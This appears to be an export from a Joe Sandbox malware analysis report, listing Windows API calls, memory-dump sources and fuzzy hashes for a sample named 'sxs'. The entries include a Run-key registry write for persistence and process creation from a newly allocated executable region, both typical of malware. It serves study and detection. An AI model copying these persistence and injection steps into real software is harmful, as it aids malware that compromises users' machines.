                                                                            • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00402FAB,00406977,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402F6B
                                                                            • GetLastError.KERNEL32(000000F5,?,00000000,?,00402FAB,00406977,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402F7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CreateErrorFileHandleLast
                                                                            • String ID:
                                                                            • API String ID: 1572049330-0
                                                                            • Opcode ID: 1fe4482e51c97fcd3ab156c21462874b1d18ea82579e8d9af765361da5b48797
                                                                            • Instruction ID: 8895028cb5cdc15445adb39e81ddeb6a4987250684acebc896c500d1f95e65c5
                                                                            • Opcode Fuzzy Hash: 1fe4482e51c97fcd3ab156c21462874b1d18ea82579e8d9af765361da5b48797
                                                                            • Instruction Fuzzy Hash: 4A11086120010296E7149F59CA8C71765649F84358F28C37BE8097F3E6D6FCCC85939D
                                                                            APIs
                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 00404BAB
                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000000,00404BF0), ref: 00404BC7
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00404BF0), ref: 00404BD0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteOpenValue
                                                                            • String ID:
                                                                            • API String ID: 849931509-0
                                                                            • Opcode ID: f6903086ebc016dd7e1dc51a1f88265785295860ed41db1915025e2c118f5eb5
                                                                            • Instruction ID: 2826a8d518f421b74224b4c9e13106b3c01b6d5214c42722886c747e2e10fd3a
                                                                            • Opcode Fuzzy Hash: f6903086ebc016dd7e1dc51a1f88265785295860ed41db1915025e2c118f5eb5
                                                                            • Instruction Fuzzy Hash: F801E1B0A04204AFDB40FFA9D84295EBBFCEF48704F5044BAB504F3691DA38DA009628
                                                                            APIs
                                                                              • Part of subcall function 00404BFC: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?,00000000,00404C35,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C0C
                                                                            • RegQueryValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000,00407EA2), ref: 00404C54
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C70
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000100,?,?,?,00407E6B,?,00000001,00000000,000DBBA0,00000000), ref: 00404C7F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Close$OpenQueryValue
                                                                            • String ID:
                                                                            • API String ID: 1607946009-0
                                                                            • Opcode ID: de490e853962903b2a5689227c4e63d122a59ebf74e7772f1ca70b50c0b4eacb
                                                                            • Instruction ID: 4b701f08789f1177e28b55cf3da9d2e9372874710ef882e2c23d1ca645a241ff
                                                                            • Opcode Fuzzy Hash: de490e853962903b2a5689227c4e63d122a59ebf74e7772f1ca70b50c0b4eacb
                                                                            • Instruction Fuzzy Hash: 56F049F160421866D700EB958C81FDE777C9B44354F0041ABBA45F7282D6789F408BE9
                                                                            APIs
                                                                            • RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00404AED
                                                                            Strings
                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00404AEB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                            • API String ID: 2289755597-1428018034
                                                                            • Opcode ID: 5b4352bfc4d5184ded5f790e2a42e1a0fdd6f660e7ca3fdf0ef6e17b68d8ca19
                                                                            • Instruction ID: f4ecd25457bc41be08a6e23874f29c63b64927a4b92a18da8b30fdf3cb70f2a0
                                                                            • Opcode Fuzzy Hash: 5b4352bfc4d5184ded5f790e2a42e1a0fdd6f660e7ca3fdf0ef6e17b68d8ca19
                                                                            • Instruction Fuzzy Hash: 39D05EB235C30079E31D96548C43FBA73949794F10F20461EB3A66A1C0DAB07504961D
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 00403965
                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 0040399A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ExitFreeLibraryProcess
                                                                            • String ID:
                                                                            • API String ID: 1404682716-0
                                                                            • Opcode ID: 0face7e6a07afa4f99c73d468a9f1e343faa34a2b1e5e58e08866c2428f9d067
                                                                            • Instruction ID: 1df635f73e8d6915756eab4c5c951cbada66195828d5823cced2058d235b0013
                                                                            • Opcode Fuzzy Hash: 0face7e6a07afa4f99c73d468a9f1e343faa34a2b1e5e58e08866c2428f9d067
                                                                            • Instruction Fuzzy Hash: 93214CF09002419BDB20AF6984887567ED96B44316F28857BE848B72D6D7BCCEC0CB59
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 00403965
                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 0040399A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ExitFreeLibraryProcess
                                                                            • String ID:
                                                                            • API String ID: 1404682716-0
                                                                            • Opcode ID: 34b4af9424ecf88636d9b1d120e9cda0082e90ba4aa25ef423796a56350a7c74
                                                                            • Instruction ID: e102d307cc8d2ba104a24443bf267b0a457ef6f3725beea8bc8804b3aaa65652
                                                                            • Opcode Fuzzy Hash: 34b4af9424ecf88636d9b1d120e9cda0082e90ba4aa25ef423796a56350a7c74
                                                                            • Instruction Fuzzy Hash: 23214AF09002419EDB20AF6984887567FE86F45316F1884BBE444A62D6D7BCCAC0CA5A
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 00403965
                                                                            • ExitProcess.KERNEL32(00000000,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000,004024A4,?,?,00407D29,00407D31,00000000), ref: 0040399A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ExitFreeLibraryProcess
                                                                            • String ID:
                                                                            • API String ID: 1404682716-0
                                                                            • Opcode ID: 7f65ca9c6e4620e585d9556c48294706103df5a0fdade0584281f7ed769f9ece
                                                                            • Instruction ID: fd5089775d46e85b253662f2f7318a69e1a8033d09b585e59d9f2ef21dff18ec
                                                                            • Opcode Fuzzy Hash: 7f65ca9c6e4620e585d9556c48294706103df5a0fdade0584281f7ed769f9ece
                                                                            • Instruction Fuzzy Hash: A0213DF09002419ADB20AF6984887567EE86F44316F14857BE444B62D6D7BCCEC0CA5D
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402B26
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00402B2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 8f9e5a5cc88b9b448b3ca2ccaa60d9936ffcce192d438f27d05647225e30c127
                                                                            • Instruction ID: a1f473cf3bc07306b130f529efb15ea380eb81567c08e13a342af83bccae4885
                                                                            • Opcode Fuzzy Hash: 8f9e5a5cc88b9b448b3ca2ccaa60d9936ffcce192d438f27d05647225e30c127
                                                                            • Instruction Fuzzy Hash: E611FE71A00109EFDB40DF69CA45A9EB7F8EF58350B108477E808EB2C0E6B4EE009765
                                                                            APIs
                                                                              • Part of subcall function 00404ACC: RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00404AED
                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B3D
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?,00000000,00000000,00404B5E), ref: 00404B43
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateValue
                                                                            • String ID:
                                                                            • API String ID: 1818849710-0
                                                                            • Opcode ID: 02498e25f307462e858126ebec8e97115087d473417d076f46eb1ea06791e8cc
                                                                            • Instruction ID: da0817da91744ea337fddb203b8369e77bf46fb650e87780acf5a1fbdeaccc1d
                                                                            • Opcode Fuzzy Hash: 02498e25f307462e858126ebec8e97115087d473417d076f46eb1ea06791e8cc
                                                                            • Instruction Fuzzy Hash: B5F068B06042087FD711AFA59C92E9EBBBCEB85718F5040BEB604B32D1DA786E11855C
                                                                            APIs
                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00402B26
                                                                            • GetLastError.KERNEL32(?,?,?,00000000), ref: 00402B2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastRead
                                                                            • String ID:
                                                                            • API String ID: 1948546556-0
                                                                            • Opcode ID: 1549d7ec87df20cd97c4e70c505dd4663c28e3963fd69a7481bb40ac7399a907
                                                                            • Instruction ID: c6e1b1fb9c3516b3f16996619766862c98deb96cc2c348e4269c8597c4437c2e
                                                                            • Opcode Fuzzy Hash: 1549d7ec87df20cd97c4e70c505dd4663c28e3963fd69a7481bb40ac7399a907
                                                                            • Instruction Fuzzy Hash: 1EF03071604118BFD704DEAADE89E6BB7ECDF54350B104477F508EB281E6B4ED009674
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040283F
                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00402848
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastWrite
                                                                            • String ID:
                                                                            • API String ID: 442123175-0
                                                                            • Opcode ID: a18c08dad6413d25b3ba872c265d0c30b30c6181a290bc4e54c623ff49f761cb
                                                                            • Instruction ID: 4855b5fc16def7a8e97b1a7a6336b917eadaa4f84f3b808a2882fe3178674162
                                                                            • Opcode Fuzzy Hash: a18c08dad6413d25b3ba872c265d0c30b30c6181a290bc4e54c623ff49f761cb
                                                                            • Instruction Fuzzy Hash: 20E092766141206BDB50EE764A84B6323CCAF48390B00C17BBA08EB285E274D8014775
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00402C69,?,00000000,00000000,?,00406987,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402590
                                                                            • SetFilePointer.KERNEL32(?,?,00000000,00000000,0040699C,00000000,00406C22,?,?,?,?,00000513,00000000,00000000), ref: 00402FC8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastPointer
                                                                            • String ID:
                                                                            • API String ID: 2976181284-0
                                                                            • Opcode ID: 34b804e8a8bd3546deaa8e8b36638855b6cfa5412d91ad7fb084b2808c24436a
                                                                            • Instruction ID: 4a6b08c2b722228e21e0a8b4d92f73f88c53a7eb371671c656a79b332b0462ea
                                                                            • Opcode Fuzzy Hash: 34b804e8a8bd3546deaa8e8b36638855b6cfa5412d91ad7fb084b2808c24436a
                                                                            • Instruction Fuzzy Hash: 79D05B201041016FE72067358A2A73D7595E744784FE44477F449F96E1E5FDCC85911D
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 004012FF
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001), ref: 00401326
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$AllocFree
                                                                            • String ID:
                                                                            • API String ID: 2087232378-0
                                                                            • Opcode ID: 4b50bbdd818b043b9c2eceaba266390bd427f996ac06b58da068fb7d09c7efa8
                                                                            • Instruction ID: d870f39221132c547acdf604606a3f6d37415c35f40f0878f1ff510f596d474e
                                                                            • Opcode Fuzzy Hash: 4b50bbdd818b043b9c2eceaba266390bd427f996ac06b58da068fb7d09c7efa8
                                                                            • Instruction Fuzzy Hash: 82F02772B0023067EB20696E0C85B4366D59F49790F14407AFF08FF3E9D6B98C0042A9
                                                                            APIs
                                                                              • Part of subcall function 005311B6: VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,005316A6,00001000), ref: 005311C3
                                                                            • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00531822
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: AllocCreateProcessVirtual
                                                                            • String ID:
                                                                            • API String ID: 3731624130-0
                                                                            • Opcode ID: bf63ac8923344cf0f07f494334df50f3db5578ecde303786fb80a434433568e3
                                                                            • Instruction ID: f35bf163610438ad47d3d825aae3b342a66b7216eb0a28839ef9269c94bb1ec5
                                                                            • Opcode Fuzzy Hash: bf63ac8923344cf0f07f494334df50f3db5578ecde303786fb80a434433568e3
                                                                            • Instruction Fuzzy Hash: EF411C72904A19AEDB259AB4DC8EFEF7FACFF44350F14046AF100E7181EE709944CA68
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,00000437,00000000,?,?,?,?,?,00000007,?,?,00439C51,?), ref: 00439E09
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 78261a6b9fe788ced663bb357de1c82fcf65985a5e25124a9952444f367811ed
                                                                            • Instruction ID: 59c6dd2a180df94c7d145a0c1afdd1ca961f3c5420aeb78bf2f24ad8b18ccf6d
                                                                            • Opcode Fuzzy Hash: 78261a6b9fe788ced663bb357de1c82fcf65985a5e25124a9952444f367811ed
                                                                            • Instruction Fuzzy Hash: 08516E72A042068FC724CF18C881A5BB3E5BF88710F19892EEC59DB355DB75ED06CB95
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,0043844C), ref: 00438565
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038875021.0000000000438000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2039027110.0000000000446000.00000080.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 4ddd04bc19eee49dddbff63bd050fb69c2f1bae6dbd96e986c565c5749236f46
                                                                            • Instruction ID: 4fc79d3f2b5b8faf063af9b8bc26cff02520aca8bab65447a439d837e7e270b0
                                                                            • Opcode Fuzzy Hash: 4ddd04bc19eee49dddbff63bd050fb69c2f1bae6dbd96e986c565c5749236f46
                                                                            • Instruction Fuzzy Hash: 2821C272904354EFEB224B14DC407BBF7A0EF88314F34686EF48A57281DA785D85CA54
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,00000000,00000000,00000000,?,00531497,00000000,00000000,00000000,?,00000000,00000000), ref: 005313EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2039572472.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_530000_sxs.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 4b9ecea32db01424dc185457aeca794cda4a3d93e46afead20aaf72f8814e263
                                                                            • Instruction ID: 2d1c0f53b8a4c757ac03afde7fdb5f3811b67f33a561e85e7a19b27d327bb1d3
                                                                            • Opcode Fuzzy Hash: 4b9ecea32db01424dc185457aeca794cda4a3d93e46afead20aaf72f8814e263
                                                                            • Instruction Fuzzy Hash: D41182B2A00605AFDF10CF39D880A657BA8FF14764F258529ED19CB351E731EC55CBA4
                                                                            APIs
                                                                            • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 004042C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2038596081.0000000000401000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2038541464.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2038596081.000000000042B000.00000004.00000001.01000000.00000003.sdmp
